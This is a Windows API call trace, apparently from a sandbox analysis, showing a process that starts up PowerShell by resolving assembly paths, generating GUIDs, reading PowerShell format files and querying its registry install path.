	[0811.553] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Certificate.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0811.562] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\mscorlib.dll", lpFilePart=0x0) returned 0x3c
	[0811.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0811.581] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System\\2.0.0.0__b77a5c561934e089\\System.dll", lpFilePart=0x0) returned 0x48
	[0811.587] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0811.589] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x12c970, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0812.906] VirtualQuery (in: lpAddress=0x12bf80, lpBuffer=0x12ce40, dwLength=0x30 | out: lpBuffer=0x12ce40*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0812.907] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xac3234f3, Data2=0x1472, Data3=0x4406, Data4=([0]=0xaf, [1]=0x73, [2]=0x77, [3]=0xc7, [4]=0x34, [5]=0x6d, [6]=0x78, [7]=0x1b))) returned 0x0
	[0812.908] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xffcc7b95, Data2=0x7344, Data3=0x4669, Data4=([0]=0xac, [1]=0x42, [2]=0x5d, [3]=0xb6, [4]=0x82, [5]=0x14, [6]=0x89, [7]=0xde))) returned 0x0
	[0812.908] VirtualQuery (in: lpAddress=0x12c130, lpBuffer=0x12cff0, dwLength=0x30 | out: lpBuffer=0x12cff0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0812.909] VirtualQuery (in: lpAddress=0x12c130, lpBuffer=0x12cff0, dwLength=0x30 | out: lpBuffer=0x12cff0*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0812.910] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xb71a22b6, Data2=0xd7c, Data3=0x46fa, Data4=([0]=0xa2, [1]=0x57, [2]=0x62, [3]=0xa4, [4]=0x15, [5]=0x3d, [6]=0xdd, [7]=0x4b))) returned 0x0
	[0812.913] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xc779a897, Data2=0x8914, Data3=0x4074, Data4=([0]=0x83, [1]=0x98, [2]=0xa0, [3]=0xeb, [4]=0x89, [5]=0x7, [6]=0x52, [7]=0xb3))) returned 0x0
	[0812.913] VirtualQuery (in: lpAddress=0x12c380, lpBuffer=0x12d240, dwLength=0x30 | out: lpBuffer=0x12d240*(BaseAddress=0x12c000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x4000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0812.914] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xe2aa78a7, Data2=0x284, Data3=0x47ae, Data4=([0]=0xa7, [1]=0x33, [2]=0x60, [3]=0x2b, [4]=0x3b, [5]=0xc6, [6]=0x2c, [7]=0xd7))) returned 0x0
	[0812.914] VirtualQuery (in: lpAddress=0x12b9f0, lpBuffer=0x12c8b0, dwLength=0x30 | out: lpBuffer=0x12c8b0*(BaseAddress=0x12b000, AllocationBase=0xb0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0812.915] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x85a3bfb8, Data2=0x6dd6, Data3=0x4936, Data4=([0]=0xaa, [1]=0x93, [2]=0x93, [3]=0x27, [4]=0x5d, [5]=0x28, [6]=0x3d, [7]=0x5f))) returned 0x0
	[0812.915] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x6d7f491, Data2=0x754, Data3=0x49d2, Data4=([0]=0xb6, [1]=0x92, [2]=0xf6, [3]=0x50, [4]=0xa6, [5]=0xf8, [6]=0x20, [7]=0x83))) returned 0x0
	[0812.915] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0812.915] GetFileType (hFile=0x2f8) returned 0x1
	[0812.915] SetErrorMode (uMode=0x1) returned 0x1
	[0812.915] GetFileType (hFile=0x2f8) returned 0x1
	[0812.915] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.916] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.916] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.916] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.916] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.916] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.916] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.917] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.920] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.920] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.921] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.921] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.921] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.922] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.922] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.922] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.925] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.926] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0xbce, lpOverlapped=0x0) returned 1
	[0812.926] ReadFile (in: hFile=0x2f8, lpBuffer=0x3420e36, nNumberOfBytesToRead=0x32, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3420e36*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0812.926] ReadFile (in: hFile=0x2f8, lpBuffer=0x3421700, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3421700*, lpNumberOfBytesRead=0x12d458*=0x0, lpOverlapped=0x0) returned 1
	[0812.926] CloseHandle (hObject=0x2f8) returned 1
	[0812.926] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d1a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0812.927] SetErrorMode (uMode=0x1) returned 0x1
	[0812.927] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\dotnettypes.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d400 | out: lpFileInformation=0x12d400*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e0582f, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e0582f, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe5e29f95, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x11bce)) returned 1
	[0812.927] SetErrorMode (uMode=0x1) returned 0x1
	[0812.927] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0812.927] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d4e8 | out: phkResult=0x12d4e8*=0x2f8) returned 0x0
	[0812.927] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d46c, lpData=0x0, lpcbData=0x12d468*=0x0 | out: lpType=0x12d46c*=0x1, lpData=0x0, lpcbData=0x12d468*=0x56) returned 0x0
	[0812.927] CoTaskMemAlloc (cb=0x5a) returned 0x1b8497b0
	[0812.927] RegQueryValueExW (in: hKey=0x2f8, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12d43c, lpData=0x1b8497b0, lpcbData=0x12d438*=0x56 | out: lpType=0x12d43c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12d438*=0x56) returned 0x0
	[0812.927] CoTaskMemFree (pv=0x1b8497b0) 
	[0812.928] RegCloseKey (hKey=0x2f8) returned 0x0
	[0812.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12d130, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0812.928] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", nBufferLength=0x105, lpBuffer=0x12cfe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\DotNetTypes.format.ps1xml", lpFilePart=0x0) returned 0x44
	[0812.929] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xb296745a, Data2=0x7ebd, Data3=0x452d, Data4=([0]=0x8d, [1]=0xf4, [2]=0xb6, [3]=0x3a, [4]=0xb5, [5]=0xb9, [6]=0x96, [7]=0x25))) returned 0x0
	[0812.929] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x3b1f221b, Data2=0x6d15, Data3=0x4b1a, Data4=([0]=0x84, [1]=0x56, [2]=0x99, [3]=0xfc, [4]=0x7c, [5]=0x7c, [6]=0x8b, [7]=0x53))) returned 0x0
	[0812.929] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x24898b4c, Data2=0x227, Data3=0x4e08, Data4=([0]=0x83, [1]=0xeb, [2]=0x17, [3]=0x74, [4]=0xd7, [5]=0x3e, [6]=0x7e, [7]=0xb1))) returned 0x0
	[0812.929] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xc1512870, Data2=0x75a9, Data3=0x440d, Data4=([0]=0x93, [1]=0x7a, [2]=0xe7, [3]=0x91, [4]=0x9b, [5]=0x8d, [6]=0xd8, [7]=0xda))) returned 0x0
	[0812.930] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x68fc5c4a, Data2=0x57b8, Data3=0x44cc, Data4=([0]=0xa3, [1]=0xfa, [2]=0x28, [3]=0x29, [4]=0x39, [5]=0x90, [6]=0x67, [7]=0x79))) returned 0x0
	[0812.930] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x6256ced2, Data2=0x74cc, Data3=0x441a, Data4=([0]=0x90, [1]=0x17, [2]=0xa2, [3]=0x57, [4]=0x71, [5]=0xe2, [6]=0x96, [7]=0xc0))) returned 0x0
	[0812.930] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x5088f7b1, Data2=0xcc2f, Data3=0x4447, Data4=([0]=0x8e, [1]=0xf6, [2]=0x37, [3]=0x72, [4]=0xe6, [5]=0x58, [6]=0xf4, [7]=0xd0))) returned 0x0
	[0812.930] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x53d65bf0, Data2=0x3760, Data3=0x485b, Data4=([0]=0x86, [1]=0xc, [2]=0xeb, [3]=0x9b, [4]=0x87, [5]=0xca, [6]=0xde, [7]=0xce))) returned 0x0
	[0812.930] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x452bbea5, Data2=0xc9be, Data3=0x4afb, Data4=([0]=0xb2, [1]=0x7b, [2]=0x54, [3]=0x2, [4]=0x21, [5]=0x32, [6]=0xf3, [7]=0xea))) returned 0x0
	[0812.930] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xf3ac7e0, Data2=0x3c83, Data3=0x4b48, Data4=([0]=0x8e, [1]=0xe7, [2]=0xea, [3]=0x75, [4]=0xf3, [5]=0xf2, [6]=0xc8, [7]=0x9e))) returned 0x0
	[0812.930] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x66ae92c2, Data2=0x91f9, Data3=0x48bf, Data4=([0]=0xb2, [1]=0x2a, [2]=0x55, [3]=0x29, [4]=0x11, [5]=0x68, [6]=0x14, [7]=0xe8))) returned 0x0
	[0812.931] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xd9af1b3f, Data2=0x2e9d, Data3=0x4c0e, Data4=([0]=0xb7, [1]=0xdd, [2]=0x71, [3]=0xcb, [4]=0xe4, [5]=0x36, [6]=0x26, [7]=0xf0))) returned 0x0
	[0812.931] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x8ab92673, Data2=0xd49d, Data3=0x4866, Data4=([0]=0x95, [1]=0x22, [2]=0xd2, [3]=0x25, [4]=0xc8, [5]=0xfb, [6]=0x87, [7]=0x72))) returned 0x0
	[0812.931] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x13b07cce, Data2=0x48cc, Data3=0x497a, Data4=([0]=0x9f, [1]=0xc5, [2]=0x62, [3]=0x3a, [4]=0x11, [5]=0xf5, [6]=0xa2, [7]=0xb6))) returned 0x0
	[0812.931] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xbc3034b2, Data2=0x378e, Data3=0x4dc9, Data4=([0]=0x9c, [1]=0x55, [2]=0xf2, [3]=0xde, [4]=0x2, [5]=0x42, [6]=0xaf, [7]=0x34))) returned 0x0
	[0812.931] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xa3cb8c93, Data2=0x6fd3, Data3=0x47b1, Data4=([0]=0xa4, [1]=0xde, [2]=0xde, [3]=0x92, [4]=0xb6, [5]=0xf7, [6]=0xbd, [7]=0xa9))) returned 0x0
	[0812.931] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x5c871f78, Data2=0x3725, Data3=0x42b3, Data4=([0]=0xb5, [1]=0x74, [2]=0x9e, [3]=0xdd, [4]=0x1a, [5]=0xfa, [6]=0x38, [7]=0xfe))) returned 0x0
	[0812.932] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x14995eca, Data2=0x3133, Data3=0x451b, Data4=([0]=0x97, [1]=0x98, [2]=0x68, [3]=0xf5, [4]=0x70, [5]=0xe, [6]=0xa3, [7]=0x5f))) returned 0x0
	[0812.932] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xba14a5bf, Data2=0x694, Data3=0x4e3c, Data4=([0]=0x89, [1]=0x4e, [2]=0x6a, [3]=0x22, [4]=0x35, [5]=0x18, [6]=0x9b, [7]=0x9b))) returned 0x0
	[0812.932] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xe41639ff, Data2=0x1297, Data3=0x42ca, Data4=([0]=0x8d, [1]=0xcc, [2]=0xa, [3]=0xad, [4]=0x4, [5]=0x8f, [6]=0xd0, [7]=0xe6))) returned 0x0
	[0812.932] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xa2828c65, Data2=0x73eb, Data3=0x4f85, Data4=([0]=0x80, [1]=0x3e, [2]=0x36, [3]=0xbe, [4]=0xe5, [5]=0xe7, [6]=0x3, [7]=0xd4))) returned 0x0
	[0812.932] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xb23c0b8f, Data2=0xa53, Data3=0x4733, Data4=([0]=0xb9, [1]=0x6, [2]=0x91, [3]=0x7d, [4]=0x6e, [5]=0x5c, [6]=0x4e, [7]=0x9b))) returned 0x0
	[0812.932] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xcd91581d, Data2=0xd536, Data3=0x4db1, Data4=([0]=0xbe, [1]=0x50, [2]=0xa4, [3]=0x4, [4]=0x13, [5]=0xde, [6]=0x4d, [7]=0x1e))) returned 0x0
	[0812.933] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x3c694fbd, Data2=0x1054, Data3=0x4478, Data4=([0]=0xb5, [1]=0x5d, [2]=0x6c, [3]=0xa0, [4]=0x49, [5]=0x34, [6]=0x78, [7]=0xc9))) returned 0x0
	[0812.933] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x68746ca2, Data2=0xe441, Data3=0x4f38, Data4=([0]=0x9e, [1]=0xc, [2]=0x16, [3]=0x4f, [4]=0xc0, [5]=0x6d, [6]=0x36, [7]=0xf1))) returned 0x0
	[0812.933] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xeb1645ba, Data2=0x89fd, Data3=0x4845, Data4=([0]=0x94, [1]=0x6, [2]=0x8e, [3]=0xe1, [4]=0x6f, [5]=0x88, [6]=0x4e, [7]=0x94))) returned 0x0
	[0812.933] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x782e5f50, Data2=0xa485, Data3=0x42f9, Data4=([0]=0x98, [1]=0x2, [2]=0xfc, [3]=0x8, [4]=0x42, [5]=0x93, [6]=0xde, [7]=0xc5))) returned 0x0
	[0812.934] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x87c858b6, Data2=0x5904, Data3=0x4993, Data4=([0]=0xbc, [1]=0x99, [2]=0x39, [3]=0x97, [4]=0x7b, [5]=0x12, [6]=0x40, [7]=0xfa))) returned 0x0
	[0812.934] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x70dd7e74, Data2=0x9f7a, Data3=0x4c36, Data4=([0]=0xa9, [1]=0xa5, [2]=0x22, [3]=0x1f, [4]=0x84, [5]=0xc, [6]=0x9b, [7]=0x30))) returned 0x0
	[0812.934] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x610afc7c, Data2=0x2a27, Data3=0x45ed, Data4=([0]=0xbe, [1]=0xf0, [2]=0x71, [3]=0xfb, [4]=0x87, [5]=0x67, [6]=0xa6, [7]=0xa5))) returned 0x0
	[0812.935] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xa3b99a7e, Data2=0xcd14, Data3=0x4785, Data4=([0]=0x8c, [1]=0x87, [2]=0x19, [3]=0xb4, [4]=0x78, [5]=0xfd, [6]=0x8e, [7]=0xdb))) returned 0x0
	[0812.935] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x82aefd77, Data2=0xd399, Data3=0x43d0, Data4=([0]=0xb3, [1]=0xf9, [2]=0xb3, [3]=0xcc, [4]=0x55, [5]=0x1, [6]=0x3f, [7]=0x34))) returned 0x0
	[0812.935] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xffbbd64f, Data2=0x67b4, Data3=0x4af5, Data4=([0]=0x86, [1]=0xb9, [2]=0xc0, [3]=0xd3, [4]=0x43, [5]=0xed, [6]=0xcc, [7]=0xaa))) returned 0x0
	[0812.936] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x914d4a34, Data2=0x29eb, Data3=0x4253, Data4=([0]=0x86, [1]=0xca, [2]=0x5a, [3]=0x1e, [4]=0x70, [5]=0x96, [6]=0xf5, [7]=0xa7))) returned 0x0
	[0812.936] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x39b65857, Data2=0xdb3e, Data3=0x4412, Data4=([0]=0x8f, [1]=0x96, [2]=0x6, [3]=0x20, [4]=0x2f, [5]=0x61, [6]=0x65, [7]=0x8d))) returned 0x0
	[0812.936] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0x30b3041, Data2=0xac4b, Data3=0x4059, Data4=([0]=0x9e, [1]=0x54, [2]=0x9, [3]=0xe3, [4]=0x2c, [5]=0x8b, [6]=0x35, [7]=0xca))) returned 0x0
	[0812.940] CoCreateGuid (in: pguid=0x12d710 | out: pguid=0x12d710*(Data1=0xab134ff, Data2=0x1faa, Data3=0x4fa6, Data4=([0]=0xae, [1]=0x50, [2]=0x83, [3]=0xa1, [4]=0x8a, [5]=0x64, [6]=0x8f, [7]=0xc8))) returned 0x0
	[0812.941] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\FileSystem.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\filesystem.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2f8
	[0812.941] GetFileType (hFile=0x2f8) returned 0x1
	[0812.941] SetErrorMode (uMode=0x1) returned 0x1
	[0812.941] GetFileType (hFile=0x2f8) returned 0x1
	[0812.941] ReadFile (in: hFile=0x2f8, lpBuffer=0x3531ee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3531ee8*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.942] ReadFile (in: hFile=0x2f8, lpBuffer=0x3531ee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3531ee8*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.943] ReadFile (in: hFile=0x2f8, lpBuffer=0x3531ee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3531ee8*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.944] ReadFile (in: hFile=0x2f8, lpBuffer=0x3531ee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3531ee8*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
	[0812.945] ReadFile (in: hFile=0x2f8, lpBuffer=0x3531ee8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d458, lpOverlapped=0x0 | out: lpBuffer=0x3531ee8*, lpNumberOfBytesRead=0x12d458*=0x1000, lpOverlapped=0x0) returned 1
